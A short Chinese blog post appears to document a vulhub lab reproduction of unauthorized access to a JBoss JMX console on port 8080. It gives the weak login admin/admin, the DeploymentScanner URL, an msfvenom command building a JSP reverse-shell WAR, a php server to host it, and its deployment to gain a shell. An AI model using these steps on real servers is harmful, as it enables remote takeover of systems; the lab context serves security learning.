Jboss未授权访问-8080

Jboss未授权访问 √

基础了解

JBOSS是一个基于J2EE的开放源代码的应用服务器。JBoss是一个管理EJB的容器和服务器。一般与Tomcat与Jetty绑定使用

Jboss未授权漏洞是指未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell

环境部署

vulhub: vulhub/jboss/CVE-2017-7504

image-20240226220709321

访问后:
image-20240226220801468

然后打开JMX Console:

image-20240226220846709

使用弱口令admin / admin登录

然后访问http://192.168.40.130:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

image-20240227114732363

然后生成马:

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.40.130 lport=6666 -f war > /tmp/a.war

执行:

cd /tmp
php -S 0.0.0.0:80

即http://192.168.40.130/a.war

部署应用:

image-20240227115232547

image-20240227115347684

访问http://192.168.40.130:8080/a可以看到拿到shell:

image-20240227122302590

posted @   starme  阅读(28)  评论(0编辑  收藏  举报
相关博文:
· DC8靶机渗透全流程
· DC3靶机渗透全流程
· JBOSS漏洞复现
· JBoss 漏洞复现
· Vulnhub Jarbas
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛